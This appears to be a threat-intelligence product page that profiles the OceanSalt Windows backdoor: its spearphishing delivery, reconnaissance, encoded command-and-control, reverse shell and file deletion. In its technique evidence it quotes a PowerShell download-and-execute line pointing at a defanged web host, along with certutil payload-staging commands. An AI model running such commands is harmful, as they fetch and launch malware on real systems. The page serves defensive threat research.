OceanSalt is a Windows malware family associated with targeted intrusion activity focused on entities connected to South Korea, North Korea, cryptocurrency, and political themes. It has been observed in campaigns affecting victims in South Korea, the United States, and Canada, and was delivered in at least some operations by the CARROTBAT dropper. Reporting noted code similarities with older Comment Crew/APT1 tooling, but those similarities were assessed as likely false-flag artifacts rather than evidence of direct overlap.
OceanSalt has been delivered through spearphishing emails carrying Microsoft Office attachments and later-stage dropper chains. Once executed, it supports host reconnaissance by collecting the victim’s IP address and enumerating running processes, including process names and IDs. It also supports command-and-control communications that use non-standard encoding, including applying a bitwise NOT operation to data before transmission, likely to hinder straightforward network inspection.
The malware includes interactive post-compromise functionality, notably the ability to create a reverse shell through the Windows command interpreter, enabling remote command execution on an infected endpoint. It also includes file deletion capability, which can support cleanup, anti-forensics, or operational tasking. Observed tradecraft places OceanSalt within a broader intrusion workflow in which a dropper presents decoy content, retrieves additional components, and installs the malware for follow-on control of the victim system.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Beginning in June 2018, we observed the OceanSalt malware family being dropped by CARROTBAT.
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Numerous entries state malware can create a remote shell or reverse shell, for example 4H RAT, BLACKCOFFEE, DarkComet, PlugX, QuasarRAT, and others. | The content repeatedly describes threat actors and malware using cmd.exe, the Windows command shell, to execute commands, launch payloads, run batch files, and automate actions on compromised hosts.
The content notes use of macros in Word/Office documents and VB scripts, including examples such as APT28, Dark Caracal, menuPass, TrickBot, OceanSalt, OilRig, Nomadic Octopus, and SQLRat executing VB scripts on hosts.
The content references malicious macros and script-based launchers, e.g., 'APT28 ... used macros to execute payloads', 'Dark Caracal has used macros in Word documents that would download a second stage if executed', 'TrickBot has used macros in Excel documents to download and deploy the malware', and 'PoetRAT has called cmd through a Word document macro.'
The content repeatedly describes malware and threat actors deleting files, directories, droppers, logs, scripts, temporary files, exfiltrated archives, and uninstalling themselves to cover tracks or reduce forensic artifacts.
"certutil -decode -f setup.txt setup.cab" and "C2 information... is encoded using an incremental XOR key"
AdFind can extract subnet information from Active Directory; actors used ipconfig /all after exploiting a machine; numerous malware and groups used ipconfig, ifconfig, arp, route, netsh, nbtstat, NBTscan, and related APIs to gather IP, MAC, DNS, DHCP, gateway, proxy, domain, ARP cache, routing, and adapter details.
Tasklist can be used to discover processes running on a system. Numerous malware families and threat groups are described as listing running processes, collecting PIDs, checking for specific process names, or enumerating loaded modules.
The content repeatedly describes malware and threat actors collecting OS version, computer name, architecture, CPU, memory, disk, language, and other host details; examples include use of commands such as ver, systeminfo, hostname, uname -m, sw_vers -productVersion, and fsutil.
"DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')" and "certutil -urlcache -split -f ... 1.txt"
Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications.
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
14 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Collects victim IP addresses.
Backdoor malware capable of deleting files from the system.
Backdoor that collects the victim's IP address.
Backdoor malware that collects names and IDs for all running processes.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.